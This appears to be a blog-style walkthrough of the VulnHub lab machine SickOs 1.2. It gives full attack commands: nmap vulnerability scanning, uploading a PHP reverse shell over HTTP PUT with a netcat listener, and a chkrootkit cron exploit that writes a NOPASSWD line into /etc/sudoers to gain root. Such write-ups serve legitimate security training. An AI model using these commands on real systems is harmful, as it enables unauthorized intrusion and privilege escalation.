Today we are playing with SickOs 1.2 from Vulnhub.
Get the IP first.
nmap -sP 192.168.18.0/24
The IP address is 192.168.18.90
.
Lets do a detailed scan now
root@kali:~# nmap 192.168.18.90 -A -O -sV -T5 -p- --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 04:22 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.90
Host is up (0.0010s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /test/: Test page
|_http-server-header: lighttpd/1.4.28
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:lighttpd:lighttpd:1.4.28:
| CVE-2013-4559 7.6 https://vulners.com/cve/CVE-2013-4559
| CVE-2014-2323 7.5 https://vulners.com/cve/CVE-2014-2323
| CVE-2013-4508 5.8 https://vulners.com/cve/CVE-2013-4508
| CVE-2018-19052 5.0 https://vulners.com/cve/CVE-2018-19052
| CVE-2014-2324 5.0 https://vulners.com/cve/CVE-2014-2324
| CVE-2011-4362 5.0 https://vulners.com/cve/CVE-2011-4362
|_ CVE-2013-4560 2.6 https://vulners.com/cve/CVE-2013-4560
MAC Address: 08:00:27:65:6A:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.18, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.04 ms 192.168.18.90
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.84 seconds
We have nothing interesting in index.php.
but there is a page /test
Lets use CURL and check allowed HTTP Options.
curl -v -X OPTIONS http://192.168.18.90/test
Here PUT is allowed. Lets try uploading a php shell there.
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Lets download this and PUT to the server.
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
tar -xzf php-reverse-shell-1.0.tar.gz
Edit the IP and PORT in the script.
Start a netcat listener in our machine
nc -nlvp 5555
and upload to server
curl --upload-file shell.php -v --url http://192.168.18.90/test/shell.php -0 --http1.0
Now try to access this in the server.
WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)
Looks like a problem with firewall. Lets try on port 443. Edit the file and re-upload to target.
We gota connection from the server. Great.
Lets now try to escalate privileges.
First get a TTY shell with the following command
python -c 'import pty;pty.spawn("/bin/bash")'
Lets have a look at the cron jobs.
ls -l /etc/cron.daily
There is a cron job with chkrootkit
. We have a vulnerability for chkrootkit here.
https://www.exploit-db.com/exploits/33899
chkrootkit will run any executable placed as /tmp/update
with root privileges.
Lets create the file.
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update
Here our cron job runs daily. So we need to wait till next time the job runs. Use this command to check if the file is updated.
ls -la /etc/sudoers
After a few minutes the /etc/sudoers
file got updated.
Now check our privileges.
We are root now. Lets find the flag.
SickOS v2 conquered! Next day next machine!